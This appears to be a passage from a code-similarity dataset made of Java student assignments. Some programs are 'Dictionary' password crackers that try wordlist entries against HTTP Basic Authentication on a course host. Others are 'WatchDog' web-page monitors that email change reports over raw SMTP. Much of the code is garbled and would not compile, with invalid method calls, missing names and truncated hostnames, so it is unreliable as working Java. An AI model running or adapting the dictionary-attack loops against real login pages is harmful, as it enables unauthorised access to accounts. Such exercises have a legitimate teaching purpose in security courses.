- "\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Dictionary extends Frame implements ActionListener {\n\n private\
\ TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n\
\ public void actionPerformed (ActionEvent e) {\n\t String s = tf.getText();\n\
\t String login=\"\";\n try{\n\t BufferedReader bufr = new BufferedReader\n\
\t\t\t(new FileReader (\"words1.txt\"));\n\t String inputLine=\"\";\n\n\n\n\t\
\ if (s.length() != 0)\n {\n\t\t inputLine = bufr.readLine();\n\t\t while\
\ ((inputLine != null) && (inputLine.length() != 3))\n\t\t {\n\t\t\t \n\t\t\t\
\ inputLine = bufr.readLine();\n\t\t }\n\n login=\":\"+inputLine;\n\
\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println(\"runing\"\
+login);\n\t }while(ta.getText().compareTo(\"Invalid URL\")!=0 || ta.getText().compareTo(\"\
Error URL\")!=0);\n\n\t System.out.println(\"The password is: \"+inputLine);\n\
}\ncatch(Exception ex){}\n\n }\n\n public Dictionary() {\n\n super (\"URL11\
\ Password\");\n\n \n add (tf, BorderLayout.LEFT);\n ta.setEditable(false);\n\
\ add (ta, BorderLayout.CENTER);\n tf.addActionListener (this);\n \
\ addWindowListener (new WindowAdapter() {\n public void windowClosing (WindowEvent\
\ e) {\n dispose();\n System.exit(0);\n }\n });\n \
\ }\n\n private String fetchURL (String urlString,String login) {\n StringWriter\
\ sw = new StringWriter();\n PrintWriter pw = new PrintWriter();\n\n try\
\ {\n URL url = new URL (urlString);\n\n \n MyAuthenticator =\
\ new MyAuthenticator();\n \n\n \n String encoding = new url.misc.BASE64Encoder().encode\
\ (login.getBytes());\n\n \n \n\n \n URLConnection uc =\
\ url.openConnection();\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in =\n new BufferedReader (new InputStreamReader\
\ (content));\n String line;\n while ((line = in.readLine()) != null)\
\ {\n pw.println (line);\n }\n } catch (MalformedURLException\
\ e) {\n pw.println (\"Invalid URL\");\n } catch (IOException e) {\n\
\ pw.println (\"Error URL\");\n }\n return sw.toString();\n }\n\
\n\n public static void main (String args[]) {\n Frame f = new Dictionary();\n\
\ f.setSize(300, 300);\n f.setVisible (true);\n }\n\n class MyAuthenticator\
\ {\n String getPasswordAuthentication(Frame f, String prompt) {\n final\
\ Dialog jd = new Dialog (f, \"Enter password\", true);\n jd.setLayout (new\
\ GridLayout (0, 1));\n Label jl = new Label (prompt);\n jd.add (jl);\n\
\ TextField username = new TextField();\n username.setBackground (Color.lightGray);\n\
\ jd.add (username);\n TextField password = new TextField();\n \
\ password.setEchoChar ('*');\n password.setBackground (Color.lightGray);\n\
\ jd.add (password);\n Button jb = new Button (\"OK\");\n jd.add\
\ (jb);\n jb.addActionListener (new ActionListener() {\n public\
\ void actionPerformed (ActionEvent e) {\n jd.dispose();\n }\n\
\ });\n jd.pack();\n jd.setVisible(true);\n return username.getText()\
\ + \":\" + password.getText();\n\n }\n }\n\n}\n \n\n class Base64Converter\n\
\ \n \n {\n\n public static final char [ ] alphabet = {\n\
\ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L',\
\ 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n\
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j',\
\ 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n\
\ 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7',\
\ '8', '9', '+', '/' }; \n\n \n \n\n public static String encode\
\ ( String s )\n \n {\n return encode ( s.getBytes ( ) );\n\
\ }\n\n public static String encode ( byte [ ] octetString )\n \
\ \n {\n int bits24;\n int bits6;\n\n char [ ] out\n\
\ = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n \
\ int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <=\
\ octetString.length )\n {\n \n bits24 = ( octetString\
\ [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF )\
\ << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n \
\ bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet\
\ [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out\
\ [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0\
\ ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6\
\ = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6\
\ ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n \
\ bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24\
\ & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n \
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF )\
\ << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n\n \
\ return new String ( out );\n }\n\n \n \n }\n\n"
- "\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.Properties;\nimport\
\ java.security.*;\n\npublic class WatchDog\n{\n private String file,tempfile1,tempfile2,tempfile3;\n\
\tprivate final String host=\"yallara.cs.rmit.edu.\";\n private final String\
\ email=\"@cs.rmit.edu.\";\n private final String from=\"watchdog@cs.rmit.edu.\"\
;\n private final String subject=\"SUBJECT:Mail from Watchdog about the changes\
\ the web-.\";\n private String baseURL=\"\";\n\tprivate String msg;\n\tprivate\
\ boolean firstTime=false;\n public WatchDog(boolean flag)\n\t{\n\t\tfirstTime=flag;\n\
\t}\n\n public void startWatching(String[] urls,String fl)\n {\n\t\tfile=fl;\n\
\t\ttempfile1=fl+\"/temp1.log\";\n\t\ttempfile2=fl+\"/temp2.log\";\n\t\ttempfile3=fl+\"\
/temp3.log\";\n\t\tSystem.out.println(tempfile3);\n\n\t\tmsg=\"\";\n\t\tfor(;;)\n\
\t\t{\n\t\t\ttry\n\t\t\t{\n\n\t\t\t\tfor(int o=0;o<urls.length;o++)\n\t\t\t\t\
{\n\t\t\t\t\tfile=fl+\"/ass2_\"+o+\".log\";\n\t\t\t\t\tURL u=new URL(urls[o]);\n\
\t\t\t\t\tString f=u.getFile();\n\t\t\t\t\tString url=urls[o];\n\t\t\t\t\tif(f.lastIndexOf('.')<f.lastIndexOf('/'))\n\
\t\t\t\t\t{\n\t\t\t\t\t\turl=f.substring(0,f.lastIndexOf('/'));\n\t\t\t\t\t\t\
url=u.getProtocol()+\"://\"+u.getHost()+url;\n\t\t\t\t\t}\n\t\t\t\t\tSystem.out.println(url);\n\
\t\t\t\t\twatch(url);\n\t\t\t\t\tmsg=msg+\"\\n\\n\";\n\t\t\t\t}\n\t\t\t\tif(firstTime==false)\n\
\t\t\t\t{\n\t\t\t boolean flag=mail(msg);\n\t\t\t if(flag)\n\t\t\t\t\t\
System.out.println(\"mail sent\");\n\t\t\t\t else\n\t\t\t\t\tSystem.out.println(\"\
mail not sent\");\n \t\t\t\t Thread.sleep(1000*60*60*24);\n\t\t\t\t}\n\t\t\t\t\
else\n\t\t\t\t\tSystem.exit(0);\n\t\t\t}\n\t\t\tcatch(Exception e)\n\t\t\t{\n\t\
\t\t\te.printStackTrace();\n\t\t\t}\n\t\t}\t\t\t\n }\n\n\tprivate void watch(String\
\ url) throws IOException\n\t{\n\t\t baseURL=url;\n\t\t msg=msg+\"Going\
\ check the URL \"+url+\".\\n\";\n\t \n\t\t String pageText=getResource(url);\n\
\n\t\t\t String [] images=getImages(pageText);\n\n\t\t\t if(firstTime==false)\n\
\t msg= msg + checkChange(pageText,images);\t \n\n\t\t msg=msg+\"\
. Checked at \"+new java.util.Date(System.currentTimeMillis())+\".\";\n\n\t\t\
\ log(pageText,images);\n\n\t\t\tif(firstTime)\n\t\t\t\tSystem.out.println(\"\
Re-run the watchDog (without the First flag).\");\n\t}\n\tprivate String checkChange(String\
\ pageText,String [] images) throws IOException\n\t{\n\t\t\n\t\tPrintWriter out=new\
\ PrintWriter(new FileOutputStream(tempfile1));\n\t\tout.println(pageText);\n\t\
\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\");\n\
\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\n\t\tBufferedReader in1=new\
\ BufferedReader(new FileReader(file));\n\t\tBufferedReader in2=new BufferedReader(new\
\ FileReader(tempfile1));\t\n\t\tString msg=\"\\n\";\n \tString temp1=\"\
\",temp2=\"\",oldText=\"\",newText=\"\";\n\n\t\t\n\t\tBufferedReader in0=new BufferedReader(new\
\ FileReader(tempfile1));\n\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t{\n\t\t\ttemp1=in0.readLine();\n\t\t\ttemp1=temp1+\"\\\
n\";\n\t\t\tnewText=newText+temp1;\n\t\t}\n\t\tin0.print();\n\t\tin0=null;\n\t\
\t\n\t\tout=new PrintWriter(new FileOutputStream(tempfile1));\n\t\tout.println(newText);\n\
\t\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\t\tnewText=\"\";\n\t\t\
temp1=\" \";\n\n\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t{\n\t\t\ttemp1=in1.readLine();\n\t\t\ttemp1=temp1+\"\\\
n\";\n\t\t\ttemp2=in2.readLine();\n\t\t\ttemp2=temp2+\"\\n\";\n\t\t\toldText=oldText+temp1;\n\
\t\t\tnewText=newText+temp2;\n\t\t}\t\t\n\n\t\tin2.print();\n\t\tin2=null;\n\n\
\t\tout=new PrintWriter(new FileOutputStream(tempfile2));\n\t\tout.println(oldText);\n\
\t\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\n\t\tmsg=msg+DiffPrint.getDiff(tempfile1,tempfile2,tempfile3);\n\
\t\tString data=\"\";\n\t\ttry{\n\t\t\tFileReader fin=new FileReader(tempfile3);\n\
\t\t\tint ch=fin.print();\n\t\t\twhile(ch!= -1)\n\t\t\t{\n\t\t\t data=data+\"\
\"+(char)ch;\n\t\t\t\t ch=fin.print();\n\t\t\t}\n\t\t}\n\t\tcatch(FileNotFoundException\
\ m){}\n\n\t\tmsg=msg+data;\n\n\t\ttemp1=in1.readLine();\n\n\t\tint numImg=Integer.parseInt(temp1);\n\
\t\tif(numImg != images.length)\n\t\t\tmsg=msg+\"The number of images has chnaged.\\\
n The number of images before was \"+numImg+\" \\n While the number of images\
\ found now is \"+images.length+\" .\\n\";\n\t\telse\n\t\t\tmsg=msg+\" is change\
\ in the number of images the .\\n\";\n\n\t\tString iText1=\"\",iText2=\"\";\n\
\t\t\n\t\tfor(int i=0;i<numImg;i++)\n\t\t{\n\t\t\tout=new PrintWriter(new FileOutputStream(tempfile1));\n\
\t\t\tout.println(images[i]);\n\t\t\tout.flush();\n\t\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\t\tout.flush();\n\t\t\tout.print();\n\t\t\tout=null;\n\n\t\t\tin2=new BufferedReader(new\
\ FileReader(tempfile1));\n\t\n\t\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t\t{\n\t\t\t\n\t\t\t\ttemp1=in1.readLine();\n\t\t\t\ttemp1=temp1+\"\
\\n\";\n\t\t\t\ttemp2=in2.readLine();\n\t\t\t\ttemp2=temp2+\"\\n\";\n\t\t\t\t\
iText1=iText1+temp1;\n\t\t\t\tiText2=iText2+temp2;\n\t\t\t}\n\t\t\t\n\t\t\tin2.print();\n\
\t\t\tin2=null;\n\n\t\t\tif(iText1.equals(iText2))\n\t\t\t\tmsg=msg+\" is change\
\ in the Image number \"+(i+1)+\". \\n\";\n\t\t\telse\n\t\t\t\tmsg=msg+\"The Image\
\ number \"+(i+1)+\" has changed. \\n\";\n\t\t}\n\n\t\treturn msg;\n\t}\n\tprivate\
\ String[] getImages(String text) throws IOException\n\t{\n\t\tString [] images,urls;\n\
\t\tjava.util.ArrayList alist=new java.util.ArrayList();\n\t\tString t=\"\";\n\
\t\tboolean img=false;\n\t\tint len=text.length();\n\t\tchar ch,last=' ';\n\t\t\
int c=0;\n\t\twhile(c<len)\n\t\t{\n\t\t\tch=text.charAt(c);\n\t\t\tif(ch=='<')\n\
\t\t\t{\n\t\t\t\tlast='<';\n\t\t\t\tt=\"\";\n\t\t\t}\n\t\t\tif(last=='<')\n\t\t\
\t{\n\t\t\t\tt=\"\"+ch;\n\t\t\t\tif(c+2 < len)\n\t\t\t\t\tt=t+text.charAt(c+1)+\"\
\"+text.charAt(c+2);\n\t\t\t\tif(t.equalsIgnoreCase(\"img\"))\n\t\t\t\t\timg=true;\n\
\t\t\t}\n\t\t\tif(img==true)\n\t\t\t\tt=+ch;\n\t\t\tif(ch=='>')\n\t\t\t{\n\t\t\
\t\tlast='>';\n\t\t\t\tif(img==true)\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\tSystem.out.println();\n\
\t\t\t\t\tint n=0;\n\t\t\t\t\tchar tch,tlast=' ';\n\t\t\t\t\tString imgPath=\"\
\",tn=\"\";\n\t\t\t\t\tboolean src=false;\n\t\t\t\t\twhile(n<t.length())\n\t\t\
\t\t\t{\n\t\t\t\t\t\ttch=t.charAt(n);\n\t\t\t\t\t\ttn=\"\"+tch;\n\t\t\t\t\t\t\
if(src==false && tn.equalsIgnoreCase(\"s\") && (n+2)<t.length())\n\t\t\t\t\t\t\
{\n\t\t\t\t\t\t\ttn=tn+t.charAt(n+1)+\"\"+t.charAt(n+2);\n\t\t\t\t\t\t\tif(tn.equalsIgnoreCase(\"\
src\"))\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tsrc=true;\n\t\t\t\t\t\t\t\tn+=2;\n\t\
\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse if(src==true)\n\t\t\t\t\t\t{\n\t\
\t\t\t\t\t\tif(tch!='\"')\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif(tch==' ' && imgPath.indexOf('.')!=\
\ -1)\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tn=t.length();\n\t\t\t\t\t\t\t\telse if(tch=='\
\ ' || tch=='=')\n\t\t\t\t\t\t\t\t\t;\n\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t\
imgPath=imgPath+tch;\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\
\t\tn++;\n\t\t\t\t\t}\n\t\t\t\t\talist.add(imgPath);\n\t\t\t\t}\n\t\t\t\timg=false;\n\
\t\t\n\t\t\t}\n\t\t\tc++;\n\t\t}\n\t\turls=(String[])alist.toArray(new String[0]);\
\ \n\t\timages=new String[urls.length];\n\t\tfor(int i=0;i<urls.length;i++)\n\t\
\t{\n\t\t\tSystem.out.println(urls[i]);\n\t\t\tif(urls[i].startsWith(\"http\"\
)==false && urls[i].startsWith(\"HTTP\")==false && urls[i].startsWith(\"/\")==false)\n\
\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(baseURL+\"/\"\
+urls[i]);\t\t\t\n\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\
\t{\n\t\t\t\t\tString f=baseURL+\"/\"+urls[i];\n\t\t\t\t\timages[i]=f.substring(0,f.lastIndexOf('/'));\n\
\t\t\t\t}\n\t\t\t}\n\t\t\telse if(urls[i].startsWith(\"http\")==false && urls[i].startsWith(\"\
HTTP\")==false)\t\n\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(baseURL+urls[i]);\n\
\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\t{\n\t\t\t\t\tString\
\ f=baseURL+urls[i];\n\t\t\t\t\timages[i]=f.substring(0,f.lastIndexOf('/'));\n\
\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(urls[i]);\n\
\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\t{\n\t\t\t\t\timages[i]=urls[i].substring(0,urls[i].lastIndexOf('/'));\n\
\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\t\treturn images;\n\t}\n\tprivate void log(String\
\ pageText,String[] images) throws IOException\n {\n\t\tPrintWriter out=new\
\ PrintWriter(new FileOutputStream(file));\n\t\tout.println(pageText);\n\t\tout.flush();\n\
\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\");\n\t\tout.flush();\t\
\n\n\t\tif(images.length>0)\n\t\t{\n\t\t\tout.println(images.length+\"\");\n\t\
\t\tout.flush();\t\n\t\t}\n\t\tfor(int i=0;i<images.length;i++)\n\t\t{\n\t\t\t\
out.println(images[i]);\n\t\t\tout.flush();\n\t\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\t\tout.flush();\t\t\n\t\t}\t\n\n\t}\n\n public String getResource(String\
\ url) throws IOException\n\t{\n\t\t\t\tSystem.out.println(\"url=\"+url);\n\t\t\
\t\tString urlData=new String(\"\");\n InputStreamReader in=new\
\ InputStreamReader(new URL(url).openStream());\n int ch=in.print();\n\
\ while(ch!= -1)\n {\n urlData=urlData+(char)ch;\n\
\ ch=in.print();\n }\n\t\treturn urlData;\n\t\
}\n\n public boolean mail (String msg) throws IOException\n {\n\
\ boolean ret=true;\n try\n {\n \
\ Socket csoc=new Socket(\"yallara.cs.rmit.edu.\",25);\n BufferedReader\
\ in=new BufferedReader(new InputStreamReader(csoc.getInputStream()));\n \
\ PrintWriter out=new PrintWriter(csoc.getOutputStream(),true);\n \
\ out.println(\"HELO \"+host);\n System.out.println(in.readLine());\n\
\ out.println(\"MAIL FROM:\"+from);\n System.out.println(in.readLine());\n\
\ out.println(\"RCPT :\");\n System.out.println(in.readLine());\n\
\ out.println(\"DATA\");\n System.out.println(in.readLine());\n\
\ out.println(\"SUBJECT:\"+subject);\n System.out.println(in.readLine());\n\
\ out.println(msg);\n \t out.println(\".\");\n \
\ System.out.println(in.readLine());\n out.println(\"QUIT\");\n \
\ System.out.println(in.readLine());\n }\n catch(Exception\
\ e)\n {\n e.printStackTrace();\n System.out.println(\"\
Some error occoured while communicating server\");\n ret=false;\n\
\ \t return ret;\n }\n\t System.out.println(\"**************************************\\\
nMAIL ->\"+msg);\n return ret;\n }\n\n\tpublic static void main\
\ (String[] args)\n\t{\n\t\tSystem.out.println(\"Usage : \\n java WatchDog <space\
\ seperated list of urls> <current path> [First] \\n {The First at the end is\
\ used when running the watch dog for a new URL for the first Time}\");\n\t\t\
boolean flag=false;\n\t\tint num=args.length-1;\n\t\tif(args[args.length-1].equalsIgnoreCase(\"\
First\"))\n\t\t{\n\t\t\tnum--;;\n\t\t\tflag=true;\n\t\t}\nSystem.out.println(args[num]);\n\
\n\t\tWatchDog w=new WatchDog(flag);\n\t\tString []u=new String[num];\n\t\tfor(int\
\ i=0;i<u.length;i++)\n\t\t\tu[i]=args[i];\n\t\tw.startWatching(u,args[num]);\n\
\t}\n}\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\nimport java.util.*;\nimport\
\ java.text.*;\n\n\n\n\npublic class WatchDog{\n \n \n \n \n \n public\
\ static void main (String[] args) throws InterruptedException, IOException{\n\
\n \n String urlString = \"http://www.cs.rmit.edu./students/\";\n \n\
\ \n String mesg = \"\";\n \n boolean flag = false;\n \n InputStream\
\ rtemp;\n \n if (args.length == 2) {\n \t\n \tSystem.err.println\
\ (\n \t\t\n \t\t\"Usage : java BruteForce <Host> <Mailhost> <Sending\
\ E-mail>\");\n \treturn;\n \t\n }\n \n \n \n BufferedReader\
\ rnew;\n \n BufferedReader rold = ReadFile (urlString);\n \n SaveFile(\"\
weblog\",urlString); \n \n Date lasttime = CheckTime(urlString);\n \n\
\ \n Date newtime = new Date();\n \n int i = 0; \n \n System.out.println(\"\
......\"); \n \n \n while (true) {\n \t\n \t \t\n \tnewtime\
\ = CheckTime(urlString);\n \t\n \tSystem.out.println (\"Checking \"+ new\
\ Date());\n \t\n \tif (newtime.toString().equals(lasttime.toString())==false)\
\ {\n \t\t\n \t\n \t rnew = ReadFile (urlString);\n \t \t\n\
\ \t\t \t\t\n \t\tmesg = CompareFile(rold,rnew);\n \t\t\n \t\t\
\n \t\tSaveFile(\"weblog\",urlString);\n \t\t\n \t\t\n \t\trold\
\ = OpenFile (\"weblog\");\n \t\t\n \t\t\n \t\tlasttime=newtime;\n \t\
\t\n \t System.out.println(\"Sending message\");\n \t \n \t \
\ SendMail(trimtag(mesg),args[0],args[1],args[2]); \n \t \n \t System.out.println(trimtag(mesg));\n\
\ \t\n \t\n \t} \n \t\n \tThread.sleep (24*3600*1000); \n \t\
}\n \n \n \n }\n\n \n \n private static BufferedReader ReadFile\
\ (String urlString) throws IOException{\n \t\n \t \
\ \n \n URL url = new URL (urlString);\n\n \n HttpURLConnection\
\ uc = (HttpURLConnection) url.openConnection();\n \n \n \
\ InputStream in = (InputStream) uc.getInputStream();\n \n BufferedReader\
\ r = new BufferedReader (new InputStreamReader (in));\n \n \n \
\ \n return r;\n \n \n }\n\n \n\n private static BufferedReader\
\ OpenFile (String FileName) throws IOException{\n \t\n FileInputStream\
\ in = new FileInputStream (FileName);\n \n InputStreamReader is=\
\ new InputStreamReader (in); \t \n \n BufferedReader\
\ r = new BufferedReader (is);\n \n \n return r;\n \n\
\ \n \n \n }\n\n\n \n \nprivate static void SaveFile (String\
\ FileName, String urlstring) throws IOException{\n \t\n \t \n \tString\
\ cmd = \"wget -q \"+urlstring+\" -O \"+ FileName ;\n \t\n \t\n \tRuntime.getRuntime().exec(cmd);\
\ \n \t \n }\n\n \n \n \n \n private static Date CheckTime (String\
\ urlString) throws IOException {\n \t\n \t URL url = new URL (urlString);\n\
\n \n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\
\ \n uc.setRequestMethod (\"HEAD\");\n \n return (new\
\ Date (uc.getLastModified()));\n \n \n \n } \n\
\ \n \n \n private static String CompareFile (BufferedReader inold, BufferedReader\
\ innew) throws IOException{\n \t\n \t\n \t\n \t Vector newF= new Vector\
\ ();\n Vector oldF= new Vector ();\n\n\n int old_count=0;\n\t \t\
int new_count=0;\n\n\t \tString line=\"\";\n\n StringBuffer mesg = new\
\ StringBuffer (\"NEW CONTENT : \\n\");\n\n\t \tint j;\n \n \n \
\ \n\t while ((line=inold.readLine())!= null){\n\n\t \t\t if (line.trim().length()!=0){\n\
\t \t\t oldF.addElement(line);\n\t \t\t \n\t \t\n\t \t\t \n\t \t\t }\n\n\t \t\
\t }\n\n\t \twhile ((line=innew.readLine()) != null){\n\t \t\t if (line.trim().length()!=0){\n\
\t \t\t newF.addElement(line);\n\t }\n\n\t \t\t }\n\n\t \tfor (int i=0;\
\ i<newF.size();i++){\n\n\t \t\t j=0;\n\n\t \t\t while (((String)newF.elementAt(i)).equals((String)oldF.elementAt(j))==false){\n\
\n\t \t\t \tj++;\n \n if (j==oldF.size()) \n \
\ { j--;\n \tbreak;\n }\n\t \t\t\
\ \t}\n\n \n \n\t \t\t if (((String)newF.elementAt(i)).equals((String)oldF.elementAt(j))){\n\
\n newF.removeElementAt(i);\n\t \t i--;\n\t \t \
\ oldF.removeElementAt(j);\n\n\n\t \t\t \t}\n\n\t \t \t}\n\n\n\n\t \tfor (int\
\ i=0; i<newF.size();i++){\n\n\t \t mesg.append((String)(newF.elementAt(i)));\n\
\t \t mesg.append(\"\\n\");\n }\n\n\n\t mesg.append(\"OLD CONTENT:\
\ \\n\");\n\n for (int i=0; i<oldF.size();i++){\n\n mesg.append((String)oldF.elementAt(i));\n\
\ mesg.append(\"\\n\");\n \n\t \t}\n\n \n\n\n\t return mesg.toString();\n\
\n\n\n\t \n\n\n}\n\n\n\nprivate static void SendMail (String mesg, \n \
\ String host,String mailhost, String sending ) throws IOException {\n\t\n \
\ String send_cmd = \"\";\n\n\ttry {\n\t\t\n\t\tSocket s = new Socket (host,\
\ 25);\n\t\t\n\t PrintStream os = new PrintStream (s.getOutputStream());\n\t\
\ \n send_cmd = \"HELO \" + mailhost;\n \n os.print(send_cmd\
\ + \"\\r\\n\");\n \n send_cmd = \"MAIL From : website@cs.rmit.edu.\"\
;\n \n os.print(send_cmd + \"\\r\\n\");\n \n send_cmd\
\ = \"RCPT : \" + sending;\n \n os.print(send_cmd + \"\\r\\n\"\
);\n \n send_cmd = \"DATA\";\n \n os.print(send_cmd\
\ + \"\\r\\n\");\n \n send_cmd = (\"Subject: Website Change Notice\"\
);\n \n os.print(send_cmd + \"\\r\\n\");\n \n os.print(\"\
\\r\\n\");\n \n os.print(mesg+\"\\r\\r\\n\");\n \n \
\ os.print(\".\\r\\n\");\n \n os.print(\"QUIT\");\n \n \
\ \t\n\t} catch (IOException e) {\n\t\tSystem.out.println(e);\n\t}\n\t\n\n\t\n\
\ }\n\n\nprivate static String trimtag (String mesg){\n\t\n\tString[] taglist\
\ = {\"<a\", \"<A\", \"<applet \", \"<APPLET\", \"<img \", \"<IMG \"}; \n\t\n\t\
String subst = \"\";\n\t\n\tStringBuffer tempst= new StringBuffer();\n\tint j\
\ = 0;\n\t\n\tint i = 0;\n\t\n\tint m = 0;\n\t\n\t\n\twhile (mesg.length()!=0)\
\ {\n\t \n\t m=0;\n\t \n\t i = mesg.indexOf(\"<\");\n\t \n\t \n\t\
\ if (i!=-1) {\n\t \n\t tempst.append(mesg.substring(0,i));\n\t \
\ \n\t \t\n\t } \n\t else { \t\n\t tempst.append(mesg.substring(0));\n\
\t break;\n }\n\t \n\t \n\t j = mesg.indexOf(\">\"); \n\t\n\t \
\ \n\t subst=mesg.substring(i,j+1); \n\t \n\t while (subst.startsWith(taglist[m])==false)\
\ {\n\t \t\n\t \tm++;\n\t \t\n\t \tif (m==taglist.length) \n\t \t\n\t\
\ \t{ m--;\n\t \t\tbreak;\n\t }\n\t \t\n\t \t}\t\n\t \n\t if\
\ (subst.startsWith(taglist[m])) tempst.append (subst);\n\t \n\t \n\t mesg\
\ = mesg.substring(j+1);\n\t \n\t \n\t }\n\t\n\t return tempst.toString();\n\
\t \n\t}\n\n\n\n\n} "
sentences:
- "\n\n\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\n\npublic class\
\ Dictionary\n{\n\n static BufferedReader in = null;\n static MyAuthenticator\
\ Auth = new MyAuthenticator();\n\n \n public static void main(String[] args)\
\ throws IOException\n {\n int tmp = 0;\n String str =\"\";\n \
\ Authenticator.setDefault(Auth);\n \n try\n {\n URL url =\
\ new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n \n \
\ \n while(tmp!=1)\n {\n try\n {\n\
\ in = new BufferedReader(new InputStreamReader(url.openStream()));\n\
\ tmp=1;\n }\n catch (IOException e) {}\n\
\ \n } \n\n while ((str = in.readLine()) !=\
\ null) \n {\n \n \n \n }\n \
\ \n\n System.out.println(\"The successful Password found using\
\ a Dictionary search is = \" + Auth.finalPass());\n\n } \n catch (MalformedURLException\
\ e) \n {System.out.println(\"mfURL\");}\n } \n\n\n}\n\nclass MyAuthenticator\
\ extends Authenticator \n{\n String username = \"\";\n static String password\
\ = \"\";\n \n static String DictFile = \"/usr/share/lib/dict/words\";\n \
\ static BufferedReader fReader;\n\n public MyAuthenticator()\n {\n \
\ try\n {\n fReader = new BufferedReader\n \
\ (new FileReader(DictFile));\n }\n catch (FileNotFoundException\
\ e)\n {\n System.out.println(\"File \" +DictFile+ \" Not Found\"\
);\n System.out.println(\" File Opened\");\n System.exit(1);\n\
\ }\n catch (IOException e)\n {\n System.out.println(\"\
File Failed..\");\n System.exit(1);\n }\n\n }\n\n static void\
\ setPass(String pswd)\n {\n password = pswd;\n }\n\n static String\
\ finalPass()\n {\n return password;\n }\n\n static String getPass()\n\
\ {\n try\n {\n if ((password = fReader.readLine()) == null)\n\
\ {\n System.out.println(\"Password Not found in file '\" +\
\ DictFile +\"'.\");\n System.exit(1);\n }\n }\n \
\ catch (IOException ioe)\n {\n System.out.println(\"File IOException\"\
);\n System.out.println(ioe);\n }\n\n return password;\n }\n\
\n\n\n protected PasswordAuthentication getPasswordAuthentication() \n { \n\
\ \n return new PasswordAuthentication(username, getPass().toCharArray());\
